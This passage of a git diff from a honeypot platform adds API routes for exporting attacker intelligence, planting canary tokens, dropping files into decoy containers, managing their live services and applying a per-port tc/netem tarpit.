+ if log_data.get("service") == "smtp_relay": + await _publish_probe_pending(log_data, _fields) + + +async def _publish_probe_pending(log_data: dict, fields: dict) -> None: + try: + bus = get_bus(client_name="ingester-probe") + await bus.connect() + await publish_safely( + bus, + _topics.smtp("probe.pending"), + { + "decky": log_data.get("decky"), + "attacker_ip": log_data.get("attacker_ip"), + "stored_as": fields.get("stored_as"), + "mail_from": fields.get("mail_from"), + "rcpt_to": fields.get("rcpt_to"), + }, + event_type="probe.pending", + ) + await bus.close() + except Exception as exc: # noqa: BLE001 + logger.debug("probe pending publish failed: %s", exc) + # ─── IP-leak detection (XFF / Forwarded / X-Real-IP / CDN variants) ────────── diff --git a/decnet/web/router/__init__.py b/decnet/web/router/__init__.py index e8ce8f63..c7138d27 100644 --- a/decnet/web/router/__init__.py +++ b/decnet/web/router/__init__.py @@ -14,6 +14,7 @@ from .fleet.api_mutate_interval import router as mutate_interval_router from .fleet.api_deploy_deckies import router as deploy_deckies_router from .stream.api_stream_events import router as stream_router from .attackers.api_get_attackers import router as attackers_router +from .attackers.api_export_attackers import router as attackers_export_router from .attackers.api_get_attacker_detail import router as attacker_detail_router from .attackers.api_get_attacker_commands import router as attacker_commands_router from .attackers.api_get_attacker_artifacts import router as attacker_artifacts_router @@ -50,6 +51,7 @@ from .swarm_mgmt import swarm_mgmt_router from .system import system_router from .topology import topology_router from .canary import canary_router +from .deckies import deckies_router from .webhooks import webhooks_router api_router = APIRouter( @@ -90,6 +92,7 @@ api_router.include_router(deploy_deckies_router) # Attacker Profiles api_router.include_router(attackers_router) +api_router.include_router(attackers_export_router) 
api_router.include_router(attacker_detail_router) api_router.include_router(attacker_commands_router) api_router.include_router(attacker_artifacts_router) @@ -156,6 +159,7 @@ api_router.include_router(topology_router) # Canary tokens — operator-facing CRUD (worker hosts the # attacker-facing surface separately via `decnet canary`). api_router.include_router(canary_router) +api_router.include_router(deckies_router) # External webhook subscriptions (SIEM/SOAR egress) api_router.include_router(webhooks_router) diff --git a/decnet/web/router/attackers/api_export_attackers.py b/decnet/web/router/attackers/api_export_attackers.py new file mode 100644 index 00000000..1e2778a4 --- /dev/null +++ b/decnet/web/router/attackers/api_export_attackers.py @@ -0,0 +1,96 @@ +"""GET /api/v1/attackers/export — bulk JSON export of all attacker + intel data.""" +import json +from datetime import datetime, timezone + +from fastapi import APIRouter, Depends +from fastapi.responses import Response + +from decnet.telemetry import traced as _traced +from decnet.web.dependencies import repo, require_viewer + +router = APIRouter() + +_SCHEMA_VERSION = "1.0" +_SOURCE = "DECNET Honeypot" + + +def _shape_observation(row: dict) -> dict: + intel = row.get("threat_intel") + return { + "uuid": row.get("uuid"), + "ip": row.get("ip"), + "first_seen": row.get("first_seen"), + "last_seen": row.get("last_seen"), + "identity_id": row.get("identity_id"), + "event_count": row.get("event_count", 0), + "service_count": row.get("service_count", 0), + "decky_count": row.get("decky_count", 0), + "services": row.get("services", []), + "deckies": row.get("deckies", []), + "traversal_path": row.get("traversal_path"), + "is_traversal": row.get("is_traversal", False), + "bounty_count": row.get("bounty_count", 0), + "credential_count": row.get("credential_count", 0), + "fingerprints": row.get("fingerprints", []), + "commands": row.get("commands", []), + "geoip": { + "country_code": row.get("country_code"), + "source": 
row.get("country_source"), + }, + "network": { + "asn": row.get("asn"), + "as_name": row.get("as_name"), + "ptr_record": row.get("ptr_record"), + }, + "threat_intel": { + "aggregate_verdict": intel.get("aggregate_verdict"), + "greynoise_classification": intel.get("greynoise_classification"), + "abuseipdb_score": intel.get("abuseipdb_score"), + "feodo_listed": intel.get("feodo_listed"), + "threatfox_listed": intel.get("threatfox_listed"), + "cached_at": intel.get("cached_at"), + } if intel else None, + } + + +@router.get( + "/attackers/export", + tags=["Attacker Profiles"], + responses={ + 200: {"content": {"application/json": {}}, "description": "JSON export download"}, + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + }, +) +@_traced("api.export_attackers") +async def export_attackers( + user: dict = Depends(require_viewer), +) -> Response: + """Export all attacker observations and threat-intel as a single JSON file. + + Returns a downloadable JSON blob. Intel columns are null for attackers the + enrichment worker has not yet processed. 
+ """ + rows = await repo.get_all_attackers_for_export() + observations = [_shape_observation(r) for r in rows] + def _dump(obj: object) -> str: + return json.dumps(obj, default=str, ensure_ascii=False, separators=(',', ':')) + + meta = _dump({ + "export_metadata": { + "source": _SOURCE, + "version": _SCHEMA_VERSION, + "exported_at": datetime.now(timezone.utc).isoformat().replace("+00:00", "Z"), + "total_records": len(observations), + "schema_version": _SCHEMA_VERSION, + } + }) + obs_lines = ",\n".join(_dump(o) for o in observations) + content = f'{meta[:-1]},"observations":[\n{obs_lines}\n]}}' + ts = datetime.now(timezone.utc).strftime("%Y%m%dT%H%M%SZ") + filename = f"decnet-export-{ts}.json" + return Response( + content=content, + media_type="application/json", + headers={"Content-Disposition": f'attachment; filename="{filename}"'}, + ) diff --git a/decnet/web/router/canary/api_tokens.py b/decnet/web/router/canary/api_tokens.py index 46ad723c..82043c93 100644 --- a/decnet/web/router/canary/api_tokens.py +++ b/decnet/web/router/canary/api_tokens.py @@ -61,6 +61,27 @@ def _row_to_response(row: dict[str, Any]) -> CanaryTokenResponse: return CanaryTokenResponse(**row) +async def _resolve_topology_target( + topology_id: str, decky_name: str, +) -> str: + """Validate (topology_id, decky_name) and return the docker container. + + Delegates to :func:`decnet.decky_io.resolve_decky_container` and + translates its ``LookupError`` into HTTP 404/422 — 404 when the + topology itself is missing, 422 when the named decky isn't in it. 
+ """ + from decnet.decky_io import resolve_decky_container + try: + return await resolve_decky_container( + repo, decky_name, topology_id=topology_id, + ) + except LookupError as exc: + msg = str(exc) + if "topology" in msg and "not found" in msg: + raise HTTPException(status_code=404, detail=msg) from exc + raise HTTPException(status_code=422, detail=msg) from exc + + def _trigger_row_to_response(row: dict[str, Any]) -> CanaryTriggerResponse: # Decode raw_headers JSON for the response shape. headers = row.get("raw_headers") or "{}" @@ -105,6 +126,14 @@ async def api_create_token( except ValueError as e: raise HTTPException(status_code=400, detail=str(e)) from e + # Resolve the docker container before any expensive work — surfacing + # 404/422 here keeps a typo from minting a half-baked token row. + container: str | None = None + if req.topology_id: + container = await _resolve_topology_target( + req.topology_id, req.decky_name, + ) + slug = token_urlsafe(16) ctx = CanaryContext( callback_token=slug, http_base=_http_base(), dns_zone=_dns_zone(), @@ -147,6 +176,7 @@ async def api_create_token( "uuid": token_uuid, "kind": kind, "decky_name": req.decky_name, + "topology_id": req.topology_id, "blob_uuid": req.blob_uuid, "instrumenter": instrumenter_name, "generator": req.generator, @@ -156,7 +186,10 @@ async def api_create_token( "created_by": admin.get("uuid", "unknown"), "state": "planted", }) - await planter.plant(req.decky_name, artifact, token_uuid=token_uuid, repo=repo) + await planter.plant( + req.decky_name, artifact, + token_uuid=token_uuid, repo=repo, container=container, + ) row = await repo.get_canary_token(token_uuid) if row is None: raise HTTPException(status_code=500, detail="token insert succeeded but row not found") @@ -177,10 +210,12 @@ async def api_list_tokens( decky_name: str | None = Query(default=None), state: str | None = Query(default=None), kind: str | None = Query(default=None), + topology_id: str | None = Query(default=None), viewer: dict = 
Depends(require_viewer), ) -> CanaryTokensResponse: rows = await repo.list_canary_tokens( decky_name=decky_name, state=state, kind=kind, + topology_id=topology_id, ) return CanaryTokensResponse( tokens=[_row_to_response(r) for r in rows], @@ -315,8 +350,21 @@ async def api_revoke_token( row = await repo.get_canary_token(uuid) if row is None: raise HTTPException(status_code=404, detail="token not found") + # Re-resolve the container at revoke time: the topology may have + # been redeployed since placement. If it's gone entirely we fall + # through to the planter's fleet default — the call will fail + # best-effort and the row still flips to revoked. + container: str | None = None + topology_id = row.get("topology_id") + if topology_id: + try: + container = await _resolve_topology_target( + topology_id, row["decky_name"], + ) + except HTTPException: + container = None await planter.revoke( row["decky_name"], row["placement_path"], - token_uuid=uuid, repo=repo, + token_uuid=uuid, repo=repo, container=container, ) return MessageResponse(message="ok") diff --git a/decnet/web/router/deckies/__init__.py b/decnet/web/router/deckies/__init__.py new file mode 100644 index 00000000..c139dd2c --- /dev/null +++ b/decnet/web/router/deckies/__init__.py @@ -0,0 +1,33 @@ +"""Cross-cutting decky operation endpoints. + +These routes apply to both fleet and MazeNET (topology) deckies; the +MazeNET case is selected by passing ``topology_id`` in the request body. + +Compare with: + +* :mod:`decnet.web.router.fleet` — fleet-only CRUD (deploy, mutate, + list). +* :mod:`decnet.web.router.topology` — topology-only CRUD. 
+""" +from __future__ import annotations + +from fastapi import APIRouter + +from .api_file_drop import router as file_drop_router +from .api_services import ( + fleet_services_router, + topology_services_router, +) +from .api_tarpit import router as tarpit_router + +deckies_router = APIRouter() +deckies_router.include_router(file_drop_router) +deckies_router.include_router(fleet_services_router) +# Topology service routes live under /topologies/{id}/... — the prefix +# is set on the router itself. Mounted under the same `deckies_router` +# umbrella because the *operation* (add/remove a service on a deployed +# decky) is identical; only the addressing scheme differs. +deckies_router.include_router(topology_services_router) +deckies_router.include_router(tarpit_router) + +__all__ = ["deckies_router"] diff --git a/decnet/web/router/deckies/api_file_drop.py b/decnet/web/router/deckies/api_file_drop.py new file mode 100644 index 00000000..2f3bb003 --- /dev/null +++ b/decnet/web/router/deckies/api_file_drop.py @@ -0,0 +1,126 @@ +"""POST/DELETE /api/v1/deckies/files — generic file drops on deckies. + +Wraps :func:`decnet.decky_io.write_file_to_container` / +:func:`decnet.decky_io.delete_file_from_container` so admins can drop +arbitrary bytes at arbitrary paths inside a running decky container — +fleet OR MazeNET — without going through the canary surface. + +Auth: ``require_admin`` everywhere (matches every other write op on +deckies; see :mod:`decnet.web.router.fleet.api_mutate_decky`). + +Container resolution mirrors the canary path: ``topology_id`` absent +means fleet (``-ssh``), present routes through +:func:`decnet.decky_io.resolve_decky_container` for the MazeNET +``-ssh`` / ``decnet_t__`` distinction. 
+""" +from __future__ import annotations + +import base64 +from datetime import datetime, timedelta, timezone + +from fastapi import APIRouter, Depends, HTTPException + +from decnet.decky_io import ( + delete_file_from_container, + resolve_decky_container, + write_file_to_container, +) +from decnet.logging import get_logger +from decnet.web.db.models import ( + DeckyFileDeleteRequest, + DeckyFileDropRequest, + MessageResponse, +) +from decnet.web.dependencies import repo, require_admin + +log = get_logger("api.deckies.files") + +router = APIRouter(prefix="/deckies/files", tags=["Deckies"]) + + +async def _resolve_container_or_4xx( + decky_name: str, topology_id: str | None, +) -> str: + """Resolve to a docker container, mapping LookupError → 404/422.""" + try: + return await resolve_decky_container( + repo, decky_name, topology_id=topology_id, + ) + except LookupError as exc: + msg = str(exc) + if topology_id and "topology" in msg and "not found" in msg: + raise HTTPException(status_code=404, detail=msg) from exc + raise HTTPException(status_code=422, detail=msg) from exc + + +@router.post( + "", + response_model=MessageResponse, + status_code=201, + responses={ + 400: {"description": "Invalid request body (bad base64, etc.)"}, + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "Topology not found"}, + 409: {"description": "docker exec failed (container down or path unwritable)"}, + 422: {"description": "Path validation failed or decky not in topology"}, + }, +) +async def api_drop_file( + req: DeckyFileDropRequest, + admin: dict = Depends(require_admin), +) -> MessageResponse: + try: + content = base64.b64decode(req.content_b64, validate=True) + except (ValueError, TypeError) as exc: + raise HTTPException( + status_code=400, detail=f"content_b64 is not valid base64: {exc}", + ) from exc + + container = await _resolve_container_or_4xx(req.decky_name, req.topology_id) + mtime = ( + 
datetime.now(timezone.utc) + timedelta(seconds=req.mtime_offset) + if req.mtime_offset + else None + ) + success, error = await write_file_to_container( + container, req.path, content, mode=req.mode, mtime=mtime, + ) + if not success: + raise HTTPException(status_code=409, detail=error or "docker exec failed") + log.info( + "decky.file.drop decky=%s topology=%s container=%s path=%s bytes=%d by=%s", + req.decky_name, req.topology_id, container, req.path, + len(content), admin.get("uuid", "unknown"), + ) + return MessageResponse(message="ok") + + +@router.delete( + "", + response_model=MessageResponse, + responses={ + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "Topology not found"}, + 422: {"description": "Path validation failed or decky not in topology"}, + }, +) +async def api_delete_file( + req: DeckyFileDeleteRequest, + admin: dict = Depends(require_admin), +) -> MessageResponse: + container = await _resolve_container_or_4xx(req.decky_name, req.topology_id) + success, error = await delete_file_from_container(container, req.path) + # ``rm -f`` returns 0 even when the file is already gone, so a + # False here means the docker exec itself failed. Don't 404 — the + # caller asked us to ensure absence and we couldn't reach the + # container. Surface it as 409. + if not success: + raise HTTPException(status_code=409, detail=error or "docker exec failed") + log.info( + "decky.file.delete decky=%s topology=%s container=%s path=%s by=%s", + req.decky_name, req.topology_id, container, req.path, + admin.get("uuid", "unknown"), + ) + return MessageResponse(message="ok") diff --git a/decnet/web/router/deckies/api_services.py b/decnet/web/router/deckies/api_services.py new file mode 100644 index 00000000..9dd2640c --- /dev/null +++ b/decnet/web/router/deckies/api_services.py @@ -0,0 +1,313 @@ +"""POST/DELETE …/{decky}/services — live service add/remove. 
+ +Two scopes mounted here: + +* fleet: ``/api/v1/deckies/{decky_name}/services`` +* topology: ``/api/v1/topologies/{topology_id}/deckies/{decky_name}/services`` + +Both return the post-mutation services list so the dashboard can +re-render without a follow-up GET. + +Auth: ``require_admin`` everywhere (matches every other write op on +deckies — see :mod:`decnet.web.router.fleet.api_mutate_decky`). +""" +from __future__ import annotations + +from fastapi import APIRouter, Depends, HTTPException, Path + +from decnet.engine.services_live import ( + ServiceConflictError, + ServiceMutationError, + ServiceNotFoundError, + add_service, + remove_service, + update_service_config, +) +from decnet.logging import get_logger +from decnet.services.base import ConfigValidationError +from decnet.web.db.models import ( + DeckyServiceAddRequest, + DeckyServiceConfigRequest, + DeckyServiceConfigResponse, + DeckyServicesResponse, +) +from decnet.web.dependencies import repo, require_admin + +log = get_logger("api.deckies.services") + + +fleet_services_router = APIRouter(tags=["Deckies"]) +topology_services_router = APIRouter(prefix="/topologies", tags=["Deckies"]) + + +def _map_mutation_error(exc: ServiceMutationError) -> HTTPException: + msg = str(exc) + if isinstance(exc, ServiceNotFoundError): + return HTTPException(status_code=404, detail=msg) + if isinstance(exc, ServiceConflictError): + return HTTPException(status_code=409, detail=msg) + return HTTPException(status_code=422, detail=msg) + + +# ---------------------------------------------------------- fleet + +@fleet_services_router.post( + "/deckies/{decky_name}/services", + status_code=201, + response_model=DeckyServicesResponse, + responses={ + 400: {"description": "Malformed request body or initial config rejected by service schema"}, + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "Decky not found"}, + 409: {"description": "Service already 
on decky"}, + 422: {"description": "Unknown or fleet_singleton service"}, + }, +) +async def api_fleet_add_service( + req: DeckyServiceAddRequest, + decky_name: str = Path(..., pattern=r"^[a-z0-9\-]{1,64}$"), + admin: dict = Depends(require_admin), +) -> DeckyServicesResponse: + try: + services = await add_service( + repo, decky_kind="fleet", + decky_name=decky_name, service_name=req.name, + config=req.config, + ) + except ConfigValidationError as exc: + raise HTTPException(status_code=400, detail=str(exc)) from exc + except ServiceMutationError as exc: + raise _map_mutation_error(exc) from exc + return DeckyServicesResponse(decky_name=decky_name, services=services) + + +async def _do_update_config( + *, decky_kind, decky_name, service_name, cfg, apply, topology_id=None, +) -> DeckyServiceConfigResponse: + try: + validated = await update_service_config( + repo, + decky_kind=decky_kind, + decky_name=decky_name, + service_name=service_name, + cfg=cfg, + apply=apply, + topology_id=topology_id, + ) + except ConfigValidationError as exc: + raise HTTPException(status_code=400, detail=str(exc)) from exc + except ServiceMutationError as exc: + raise _map_mutation_error(exc) from exc + return DeckyServiceConfigResponse( + decky_name=decky_name, + service_name=service_name, + topology_id=topology_id, + config=validated, + recreated=apply, + ) + + +@fleet_services_router.put( + "/deckies/{decky_name}/services/{service_name}/config", + response_model=DeckyServiceConfigResponse, + responses={ + 400: {"description": "Config rejected by service schema"}, + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "Decky not found"}, + 409: {"description": "Service not on decky"}, + 422: {"description": "Unknown service"}, + }, +) +async def api_fleet_put_service_config( + req: DeckyServiceConfigRequest, + decky_name: str = Path(..., pattern=r"^[a-z0-9\-]{1,64}$"), + service_name: str = Path(..., 
pattern=r"^[a-z0-9_\-]{1,64}$"), + admin: dict = Depends(require_admin), +) -> DeckyServiceConfigResponse: + """Persist new service_config (DB + compose); container untouched.""" + return await _do_update_config( + decky_kind="fleet", + decky_name=decky_name, + service_name=service_name, + cfg=req.config, + apply=False, + ) + + +@fleet_services_router.post( + "/deckies/{decky_name}/services/{service_name}/apply", + status_code=201, + response_model=DeckyServiceConfigResponse, + responses={ + 400: {"description": "Config rejected by service schema"}, + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "Decky not found"}, + 409: {"description": "Service not on decky"}, + 422: {"description": "Unknown service"}, + }, +) +async def api_fleet_apply_service_config( + req: DeckyServiceConfigRequest, + decky_name: str = Path(..., pattern=r"^[a-z0-9\-]{1,64}$"), + service_name: str = Path(..., pattern=r"^[a-z0-9_\-]{1,64}$"), + admin: dict = Depends(require_admin), +) -> DeckyServiceConfigResponse: + """Persist + force-recreate that one service container. 
Destructive.""" + return await _do_update_config( + decky_kind="fleet", + decky_name=decky_name, + service_name=service_name, + cfg=req.config, + apply=True, + ) + + +@fleet_services_router.delete( + "/deckies/{decky_name}/services/{service_name}", + response_model=DeckyServicesResponse, + responses={ + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "Decky not found"}, + 409: {"description": "Service not on decky"}, + }, +) +async def api_fleet_remove_service( + decky_name: str = Path(..., pattern=r"^[a-z0-9\-]{1,64}$"), + service_name: str = Path(..., pattern=r"^[a-z0-9_\-]{1,64}$"), + admin: dict = Depends(require_admin), +) -> DeckyServicesResponse: + try: + services = await remove_service( + repo, decky_kind="fleet", + decky_name=decky_name, service_name=service_name, + ) + except ServiceMutationError as exc: + raise _map_mutation_error(exc) from exc + return DeckyServicesResponse(decky_name=decky_name, services=services) + + +# ---------------------------------------------------------- topology + +@topology_services_router.post( + "/{topology_id}/deckies/{decky_name}/services", + status_code=201, + response_model=DeckyServicesResponse, + responses={ + 400: {"description": "Malformed request body or initial config rejected by service schema"}, + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "Topology or decky not found"}, + 409: {"description": "Service already on decky"}, + 422: {"description": "Unknown or fleet_singleton service"}, + }, +) +async def api_topology_add_service( + req: DeckyServiceAddRequest, + topology_id: str = Path(...), + decky_name: str = Path(..., pattern=r"^[a-z0-9\-]{1,64}$"), + admin: dict = Depends(require_admin), +) -> DeckyServicesResponse: + try: + services = await add_service( + repo, decky_kind="topology", topology_id=topology_id, + decky_name=decky_name, 
service_name=req.name, + config=req.config, + ) + except ConfigValidationError as exc: + raise HTTPException(status_code=400, detail=str(exc)) from exc + except ServiceMutationError as exc: + raise _map_mutation_error(exc) from exc + return DeckyServicesResponse( + decky_name=decky_name, topology_id=topology_id, services=services, + ) + + +@topology_services_router.put( + "/{topology_id}/deckies/{decky_name}/services/{service_name}/config", + response_model=DeckyServiceConfigResponse, + responses={ + 400: {"description": "Config rejected by service schema"}, + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "Topology or decky not found"}, + 409: {"description": "Service not on decky"}, + 422: {"description": "Unknown service"}, + }, +) +async def api_topology_put_service_config( + req: DeckyServiceConfigRequest, + topology_id: str = Path(...), + decky_name: str = Path(..., pattern=r"^[a-z0-9\-]{1,64}$"), + service_name: str = Path(..., pattern=r"^[a-z0-9_\-]{1,64}$"), + admin: dict = Depends(require_admin), +) -> DeckyServiceConfigResponse: + return await _do_update_config( + decky_kind="topology", + topology_id=topology_id, + decky_name=decky_name, + service_name=service_name, + cfg=req.config, + apply=False, + ) + + +@topology_services_router.post( + "/{topology_id}/deckies/{decky_name}/services/{service_name}/apply", + status_code=201, + response_model=DeckyServiceConfigResponse, + responses={ + 400: {"description": "Config rejected by service schema"}, + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "Topology or decky not found"}, + 409: {"description": "Service not on decky"}, + 422: {"description": "Unknown service"}, + }, +) +async def api_topology_apply_service_config( + req: DeckyServiceConfigRequest, + topology_id: str = Path(...), + decky_name: str = Path(..., 
pattern=r"^[a-z0-9\-]{1,64}$"), + service_name: str = Path(..., pattern=r"^[a-z0-9_\-]{1,64}$"), + admin: dict = Depends(require_admin), +) -> DeckyServiceConfigResponse: + return await _do_update_config( + decky_kind="topology", + topology_id=topology_id, + decky_name=decky_name, + service_name=service_name, + cfg=req.config, + apply=True, + ) + + +@topology_services_router.delete( + "/{topology_id}/deckies/{decky_name}/services/{service_name}", + response_model=DeckyServicesResponse, + responses={ + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "Topology or decky not found"}, + 409: {"description": "Service not on decky"}, + }, +) +async def api_topology_remove_service( + topology_id: str = Path(...), + decky_name: str = Path(..., pattern=r"^[a-z0-9\-]{1,64}$"), + service_name: str = Path(..., pattern=r"^[a-z0-9_\-]{1,64}$"), + admin: dict = Depends(require_admin), +) -> DeckyServicesResponse: + try: + services = await remove_service( + repo, decky_kind="topology", topology_id=topology_id, + decky_name=decky_name, service_name=service_name, + ) + except ServiceMutationError as exc: + raise _map_mutation_error(exc) from exc + return DeckyServicesResponse( + decky_name=decky_name, topology_id=topology_id, services=services, + ) diff --git a/decnet/web/router/deckies/api_tarpit.py b/decnet/web/router/deckies/api_tarpit.py new file mode 100644 index 00000000..b3d76890 --- /dev/null +++ b/decnet/web/router/deckies/api_tarpit.py @@ -0,0 +1,229 @@ +"""POST/GET/DELETE /api/v1/deckies/{decky_name}/tarpit — per-decky tc netem tarpit. + +Applies port-selective traffic delay on the host veth paired to the target +decky container using tc qdisc (HTB + netem). Requires CAP_NET_ADMIN on +the API process (provided by decnet-api.service AmbientCapabilities). + +Auth: ``require_admin`` for write operations, ``require_viewer`` for GET. 
+""" +from __future__ import annotations + +import asyncio +import json +import socket +import subprocess # nosec B404 + +from fastapi import APIRouter, Depends, HTTPException, Path + +from decnet.logging import get_logger +from decnet.network import get_container_pid, get_container_veth +from decnet.web.db.models import ( + MessageResponse, + TarpitEnableRequest, + TarpitRuleResponse, + TarpitStatusResponse, +) +from decnet.web.dependencies import repo, require_admin, require_viewer + +log = get_logger("api.deckies.tarpit") + +router = APIRouter(prefix="/deckies/{decky_name}/tarpit", tags=["Deckies"]) + +_DECKY_RE = r"^[a-z0-9\-]{1,64}$" + + +def _tc(*args: str) -> subprocess.CompletedProcess[str]: + cmd = ["tc", *args] + return subprocess.run(cmd, capture_output=True, text=True) # nosec B603 B404 + + +def _apply_tarpit(veth: str, ports: list[int], delay_ms: int) -> None: + """Build tc qdisc + class + netem + per-port filters on veth.""" + steps = [ + ["qdisc", "add", "dev", veth, "root", "handle", "1:", "htb"], + ["class", "add", "dev", veth, "parent", "1:", "classid", "1:1", + "htb", "rate", "1gbit"], + ["qdisc", "add", "dev", veth, "parent", "1:1", "handle", "10:", + "netem", "delay", f"{delay_ms}ms"], + ] + for args in steps: + r = _tc(*args) + if r.returncode != 0: + raise RuntimeError(r.stderr.strip()) + + for port in ports: + r = _tc( + "filter", "add", "dev", veth, + "protocol", "ip", "parent", "1:", "prio", "1", + "u32", "match", "ip", "dport", str(port), "0xffff", + "flowid", "1:1", + ) + if r.returncode != 0: + raise RuntimeError(r.stderr.strip()) + + +def _remove_tarpit(veth: str) -> bool: + """Tear down the qdisc tree. 
Returns False if nothing was there.""" + r = _tc("qdisc", "del", "dev", veth, "root") + if r.returncode != 0: + if "Cannot find" in r.stderr or "No such" in r.stderr: + return False + raise RuntimeError(r.stderr.strip()) + return True + + +def _get_active_connections(pid: int, ports: list[int]) -> list[dict]: + """Read /proc/{pid}/net/tcp and return active connections on tarpitted ports.""" + try: + with open(f"/proc/{pid}/net/tcp") as f: + content = f.read() + except OSError: + return [] + + conns: list[dict] = [] + for line in content.strip().splitlines()[1:]: + parts = line.split() + if len(parts) < 4: + continue + local_hex, rem_hex, state = parts[1], parts[2], parts[3] + if state != "01": + continue + local_port = int(local_hex.split(":")[1], 16) + if local_port not in ports: + continue + rem_ip_hex = rem_hex.split(":")[0] + try: + ip = socket.inet_ntoa(bytes.fromhex(rem_ip_hex)[::-1]) + except (ValueError, OSError): + continue + if ip != "0.0.0.0": # nosec B104 + conns.append({"ip": ip, "port": local_port}) + return conns + + +@router.post( + "", + response_model=MessageResponse, + status_code=201, + responses={ + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "Decky not found in active deployment"}, + 409: {"description": "tc command failed (qdisc already exists or veth unreachable)"}, + }, +) +async def api_enable_tarpit( + decky_name: str = Path(..., pattern=_DECKY_RE), + req: TarpitEnableRequest = ..., # type: ignore[assignment] + admin: dict = Depends(require_admin), +) -> MessageResponse: + try: + veth = await asyncio.to_thread(get_container_veth, decky_name) + except LookupError as exc: + raise HTTPException(status_code=404, detail=str(exc)) from exc + + try: + await asyncio.to_thread(_apply_tarpit, veth, req.ports, req.delay_ms) + except RuntimeError as exc: + raise HTTPException(status_code=409, detail=str(exc)) from exc + + ports_json = json.dumps(req.ports) + await 
repo.set_tarpit_rule({ + "decky_name": decky_name, + "ports": ports_json, + "delay_ms": req.delay_ms, + "created_by": admin.get("uuid", "unknown"), + }) + await repo.add_log({ + "decky": decky_name, + "service": "tarpit", + "event_type": "tarpit_enabled", + "attacker_ip": "0.0.0.0", # nosec B104 + "raw_line": ( + f"tarpit enabled decky={decky_name} ports={req.ports} delay={req.delay_ms}ms" + f" by={admin.get('uuid', 'unknown')}" + ), + "fields": json.dumps({ + "ports": req.ports, + "delay_ms": req.delay_ms, + "veth": veth, + "operator": admin.get("uuid"), + }), + }) + log.info( + "tarpit enabled decky=%s ports=%s delay_ms=%d veth=%s by=%s", + decky_name, req.ports, req.delay_ms, veth, admin.get("uuid"), + ) + return MessageResponse(message="tarpit active") + + +@router.get( + "", + response_model=TarpitStatusResponse, + responses={ + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "No active tarpit rule for this decky"}, + }, +) +async def api_get_tarpit( + decky_name: str = Path(..., pattern=_DECKY_RE), + viewer: dict = Depends(require_viewer), +) -> TarpitStatusResponse: + rule = await repo.get_tarpit_rule(decky_name) + if rule is None: + raise HTTPException(status_code=404, detail="No active tarpit rule for this decky") + + conns: list[dict] = [] + try: + pid = await asyncio.to_thread(get_container_pid, decky_name) + raw_conns = await asyncio.to_thread(_get_active_connections, pid, rule["ports"]) + for c in raw_conns: + conns.append({"ip": c["ip"], "port": c["port"]}) + except LookupError: + pass + + return TarpitStatusResponse( + rule=TarpitRuleResponse(**rule), + active_connections=conns, + ) + + +@router.delete( + "", + response_model=MessageResponse, + responses={ + 401: {"description": "Could not validate credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "Decky container not found"}, + 409: {"description": "tc teardown failed"}, + }, +) 
+async def api_disable_tarpit( + decky_name: str = Path(..., pattern=_DECKY_RE), + admin: dict = Depends(require_admin), +) -> MessageResponse: + try: + veth = await asyncio.to_thread(get_container_veth, decky_name) + except LookupError as exc: + raise HTTPException(status_code=404, detail=str(exc)) from exc + + try: + await asyncio.to_thread(_remove_tarpit, veth) + except RuntimeError as exc: + raise HTTPException(status_code=409, detail=str(exc)) from exc + + await repo.delete_tarpit_rule(decky_name) + await repo.add_log({ + "decky": decky_name, + "service": "tarpit", + "event_type": "tarpit_disabled", + "attacker_ip": "0.0.0.0", # nosec B104 + "raw_line": ( + f"tarpit disabled decky={decky_name}" + f" by={admin.get('uuid', 'unknown')}" + ), + "fields": json.dumps({"veth": veth, "operator": admin.get("uuid")}), + }) + log.info("tarpit disabled decky=%s veth=%s by=%s", decky_name, veth, admin.get("uuid")) + return MessageResponse(message="tarpit removed") diff --git a/decnet/web/router/realism/api_config.py b/decnet/web/router/realism/api_config.py index 118acb77..214f4726 100644 --- a/decnet/web/router/realism/api_config.py +++ b/decnet/web/router/realism/api_config.py @@ -16,6 +16,7 @@ waiting for the orchestrator's next refresh tick. """ from __future__ import annotations +import asyncio import json from typing import Any @@ -30,6 +31,8 @@ router = APIRouter() log = get_logger("api.realism.config") _CONFIG_KEY = "weights" +_hydrated = False +_hydrate_lock = asyncio.Lock() @router.get( @@ -51,20 +54,22 @@ async def get_config( restart the ``realism_config`` row is loaded into this process the first time GET is called; subsequent reads are local. """ - # Lazy hydration — first call after restart pulls from DB so the - # admin sees what the orchestrator is actually using, not the - # baked-in defaults. 
- row = await repo.get_realism_config(_CONFIG_KEY) - if row is not None: - try: - stored = json.loads(row.get("value") or "{}") - if isinstance(stored, dict): - planner.apply_payload(stored) - except (json.JSONDecodeError, ValueError) as exc: - log.warning( - "api.realism.get_config: stored payload invalid, " - "serving defaults: %s", exc, - ) + global _hydrated + if not _hydrated: + async with _hydrate_lock: + if not _hydrated: + row = await repo.get_realism_config(_CONFIG_KEY) + if row is not None: + try: + stored = json.loads(row.get("value") or "{}") + if isinstance(stored, dict): + planner.apply_payload(stored) + except (json.JSONDecodeError, ValueError) as exc: + log.warning( + "api.realism.get_config: stored payload invalid, " + "serving defaults: %s", exc, + ) + _hydrated = True return planner.current_payload() @@ -94,14 +99,17 @@ async def put_config( Validation: any structural failure raises 400 *before* the rebind, so the live config never goes torn. """ + global _hydrated if not isinstance(body, dict): raise HTTPException(status_code=400, detail="body must be an object") try: - planner.apply_payload(body) + dropped = planner.apply_payload(body) except ValueError as exc: raise HTTPException(status_code=400, detail=str(exc)) from exc + _hydrated = True + # Persist what the 